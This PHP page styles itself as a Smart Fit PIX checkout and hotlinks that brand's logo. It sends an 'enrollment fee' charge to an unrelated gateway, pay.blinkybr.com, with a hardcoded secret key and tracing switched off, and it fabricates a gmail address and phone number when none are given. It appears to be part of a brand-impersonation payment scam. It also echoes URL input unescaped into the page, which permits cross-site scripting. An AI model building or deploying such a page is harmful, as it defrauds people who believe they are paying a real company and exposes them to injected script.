<?php
session_start();

$transactionId = isset($_GET['transactionId']) ? $_GET['transactionId'] : null;
$result = null;

$secretKey = '6d493752-22b6-44c5-a298-2d2d36152455';

$nome = isset($_GET['nome']) ? $_GET['nome'] : 'teste';
$idAleatorio = random_int(1000, 9999);
$email = isset($_GET['email']) ? $_GET['email'] : str_replace(' ', '', $nome) . $idAleatorio . "@gmail.com";
$cpf = isset($_GET['cpf']) ? $_GET['cpf'] : '';
$floatAmount = isset($_GET['amount']) ? $_GET['amount'] : '';
$amount = isset($_GET['amount']) ? intval(floatval($_GET['amount']) * 100) : '';
$telefone = isset($_GET['phone']) ? $_GET['phone'] : "67999999999";
$cpfLimpo = preg_replace('/\D/', '', $cpf);
$telefoneLimpo = preg_replace('/\D/', '', $telefone);

$data = [
    "name" => $nome,
    "email" => $email,
    "cpf" => $cpfLimpo,
    "phone" => $telefoneLimpo,
    "paymentMethod" => "PIX",
    "amount" => $amount, // Valor dinâmico vindo da URL
    "traceable" => false,
    "items" => [
        [
            "unitPrice" => $amount,
            "title" => "Taxa de matricula 1",
            "quantity" => 1,
            "tangible" => false
        ]
    ]
];



$ch = curl_init();

// Configuração do cURL
curl_setopt($ch, CURLOPT_URL, 'https://pay.blinkybr.com/api/v1/transaction.purchase');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Authorization: ' . $secretKey,
    'Content-Type: application/json',
]);

// Execução da requisição
$response = curl_exec($ch);

// Depuração
if (curl_errno($ch)) {
    echo 'Erro ao conectar: ' . curl_error($ch);
    exit;
}

$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Fechamento da sessão cURL
curl_close($ch);

// Exibe a resposta e o código de status HTTP para ajudar na depuração

$result = json_decode($response, true);

$_SESSION['transaction'] = $result;
?>

<!DOCTYPE html>
<html lang="pt-br">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Smart Fit - Pagamento PIX</title>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css">
    <link
        href="https://fonts.googleapis.com/css2?family=DM+Sans:ital,opsz,wght@0,9..40,100..1000;1,9..40,100..1000&display=swap"
        rel="stylesheet">
    <style>
        :root {
            --primary-color: #FFBB00;
            --secondary-color: #e5a800;
            --background-color: #f5f5f5;
            --card-background: #ffffff;
            --text-color: #333333;
            --step-bg: #f8f9fa;
        }

        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body {
            font-family: 'DM Sans', sans-serif;
            background-color: var(--background-color);
            color: var(--text-color);
            line-height: 1.6;
        }

        .header {
            background-color: white;
            padding: 1rem;
            box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
            position: sticky;
            top: 0;
            z-index: 1000;
        }

        .header-content {
            max-width: 1200px;
            margin: 0 auto;
            display: flex;
            align-items: center;
            justify-content: space-between;
        }

        .logo {
            height: 40px;
            width: auto;
        }

        .main-container {
            max-width: 1200px;
            margin: 2rem auto;
            padding: 0 1rem;
            display: grid;
            grid-template-columns: 2fr 1fr;
            gap: 2rem;
        }

        .pix-card {
            background-color: var(--card-background);
            border-radius: 12px;
            box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
            padding: 2rem;
            margin-bottom: 2rem;
        }

        .card-header {
            display: flex;
            align-items: center;
            margin-bottom: 1.5rem;
            border-bottom: 2px solid var(--primary-color);
            padding-bottom: 1rem;
        }

        .card-header i {
            font-size: 2rem;
            color: var(--primary-color);
            margin-right: 1rem;
        }

        .card-header h2 {
            font-size: 1.5rem;
            color: var(--text-color);
            font-weight: 600;
        }

        .input-group {
            position: relative;
            margin-bottom: 1.5rem;
        }

        .pix-input {
            width: 100%;
            padding: 1rem;
            font-size: 1rem;
            border: 2px solid #e0e0e0;
            border-radius: 8px;
            background-color: #f8f8f8;
            transition: all 0.3s ease;
            font-family: 'DM Sans', sans-serif;
        }

        .pix-input:focus {
            outline: none;
            border-color: var(--primary-color);
            box-shadow: 0 0 0 3px rgba(255, 187, 0, 0.1);
        }

        .copy-button {
            display: flex;
            align-items: center;
            justify-content: center;
            gap: 0.5rem;
            background-color: var(--primary-color);
            color: white;
            border: none;
            border-radius: 8px;
            padding: 1rem 2rem;
            font-size: 1rem;
            font-weight: 600;
            cursor: pointer;
            transition: all 0.3s ease;
            width: 100%;
            font-family: 'DM Sans', sans-serif;
        }

        .copy-button:hover {
            background-color: var(--secondary-color);
            transform: translateY(-1px);
        }

        .copy-button:active {
            transform: translateY(0);
        }

        .qr-code-container {
            margin-top: 2rem;
            text-align: center;
            padding: 2rem;
            background-color: var(--step-bg);
            border-radius: 12px;
        }

        .qr-code-container h3 {
            color: var(--text-color);
            margin-bottom: 1rem;
            font-weight: 600;
        }

        .success-message {
            position: fixed;
            top: 20px;
            right: 20px;
            background-color: var(--primary-color);
            color: white;
            padding: 1rem;
            border-radius: 8px;
            box-shadow: 0 2px 4px rgba(0, 0, 0, 0.2);
            display: none;
            animation: slideIn 0.3s ease;
            font-family: 'DM Sans', sans-serif;
        }

        .steps-container {
            background-color: white;
            border-radius: 12px;
            padding: 2rem;
            box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
        }

        .step-title {
            color: var(--text-color);
            font-size: 1.3rem;
            margin-bottom: 1.5rem;
            padding-bottom: 0.5rem;
            border-bottom: 2px solid var(--primary-color);
            font-weight: 600;
        }

        .step {
            display: flex;
            align-items: flex-start;
            margin-bottom: 1.5rem;
            padding: 1rem;
            background-color: var(--step-bg);
            border-radius: 8px;
            transition: transform 0.3s ease;
        }

        .step:hover {
            transform: translateX(10px);
        }

        .step-icon {
            background-color: var(--primary-color);
            color: white;
            width: 40px;
            height: 40px;
            border-radius: 50%;
            display: flex;
            align-items: center;
            justify-content: center;
            margin-right: 1rem;
            flex-shrink: 0;
        }

        .step-content {
            flex-grow: 1;
        }

        .step-content h4 {
            color: var(--text-color);
            margin-bottom: 0.5rem;
            font-weight: 600;
        }

        .pix-value {
            background-color: var(--step-bg);
            border-radius: 8px;
            padding: 1.5rem;
            margin-bottom: 1.5rem;
            text-align: center;
        }

        .pix-value-label {
            color: var(--text-color);
            font-size: 1rem;
            margin-bottom: 0.5rem;
        }

        .pix-value-amount {
            color: var(--primary-color);
            font-size: 2rem;
            font-weight: bold;
        }

        .pix-type {
            display: inline-block;
            background-color: var(--primary-color);
            color: white;
            padding: 0.5rem 1rem;
            border-radius: 20px;
            font-size: 0.9rem;
            margin-top: 1rem;
        }

        @keyframes slideIn {
            from {
                transform: translateX(100%);
                opacity: 0;
            }

            to {
                transform: translateX(0);
                opacity: 1;
            }
        }

        @media (max-width: 968px) {
            .main-container {
                grid-template-columns: 1fr;
            }

            .header-content {
                flex-direction: column;
                text-align: center;
            }

            .logo {
                margin-bottom: 1rem;
            }
        }

        @media (max-width: 768px) {
            .main-container {
                padding: 0 1rem;
            }

            .pix-card {
                padding: 1.5rem;
            }

            .step {
                flex-direction: column;
                align-items: center;
                text-align: center;
            }

            .step-icon {
                margin-right: 0;
                margin-bottom: 1rem;
            }
        }
    </style>
</head>

<body>
    <header class="header">
        <div class="header-content">
            <img src="https://assets3.smartfit.com.br/assets/new-home-v4-assets/logo-dark.svg" alt="Smart Fit"
                class="logo">
        </div>
    </header>

    <div class="main-container">
        <div class="pix-section">
            <div class="pix-card">
                <div class="card-header">
                    <i class="fas fa-key"></i>
                    <h2>Código PIX Gerado</h2>
                </div>

                <div class="pix-value">
                    <div class="pix-value-label">Valor do PIX</div>
                    <div class="pix-value-amount">R$ <?php echo isset($floatAmount) ? $floatAmount : '29,46'; ?></div>
                    <div class="pix-type">
                        <i class="fas fa-copy"></i> Copia e Cola
                    </div>
                </div>

                <div class="input-group">
                    <input type="text" id="pixCode" class="pix-input"
                        value="<?php echo isset($result['pixCode']) ? $result['pixCode'] : ''; ?>"
                        readonly>
                </div>

                <button onclick="copyPixCode()" class="copy-button">
                    <i class="far fa-copy"></i>
                    Copiar Código PIX
                </button>

                <div class="qr-code-container">
                    <h3>QR Code PIX</h3>
                    <div id="qrcode">
                        <img src="<?php echo isset($result['pixQrCode']) ? $result['pixQrCode'] : ''; ?>">
                    </div>
                </div>
            </div>
        </div>

        <div class="steps-container">
            <h3 class="step-title">Como Pagar com PIX Copia e Cola</h3>

            <div class="step">
                <div class="step-icon">
                    <i class="fas fa-copy"></i>
                </div>
                <div class="step-content">
                    <h4>1. Copie o Código</h4>
                    <p>Clique no botão "Copiar Código PIX" para copiar o código gerado</p>
                </div>
            </div>

            <div class="step">
                <div class="step-icon">
                    <i class="fas fa-mobile-alt"></i>
                </div>
                <div class="step-content">
                    <h4>2. Abra seu App</h4>
                    <p>Acesse o aplicativo do seu banco e procure a opção PIX</p>
                </div>
            </div>

            <div class="step">
                <div class="step-icon">
                    <i class="fas fa-paste"></i>
                </div>
                <div class="step-content">
                    <h4>3. Cole o Código</h4>
                    <p>Escolha "PIX Copia e Cola" e cole o código copiado</p>
                </div>
            </div>

            <div class="step">
                <div class="step-icon">
                    <i class="fas fa-check-circle"></i>
                </div>
                <div class="step-content">
                    <h4>4. Confirme o Pagamento</h4>
                    <p>Verifique os dados e confirme a transação</p>
                </div>
            </div>
        </div>
    </div>

    <div id="successMessage" class="success-message">
        Código PIX copiado com sucesso!
    </div>

    <!-- <script src="https://cdnjs.cloudflare.com/ajax/libs/qrcodejs/1.0.0/qrcode.min.js"></script> -->
    <script>
        function copyPixCode() {
            const copyText = document.getElementById("pixCode");
            copyText.select();
            copyText.setSelectionRange(0, 99999);
            document.execCommand("copy");

            const successMessage = document.getElementById("successMessage");
            successMessage.style.display = "block";

            setTimeout(() => {
                successMessage.style.display = "none";
            }, 3000);
        }

        window.onload = function () {
            // const pixCode = document.getElementById("pixCode").value;
            // if (pixCode) {
            //     new QRCode(document.getElementById("qrcode"), {
            //         text: pixCode,
            //         width: 200,
            //         height: 200,
            //         colorDark: "#000000",
            //         colorLight: "#ffffff",
            //         correctLevel: QRCode.CorrectLevel.H
            //     });
            // }

            // setTimeout(() => {
            //     window.location.href = "/uppp2/index.html";
            // }, 120000);
        };
    </script>
</body>

</html>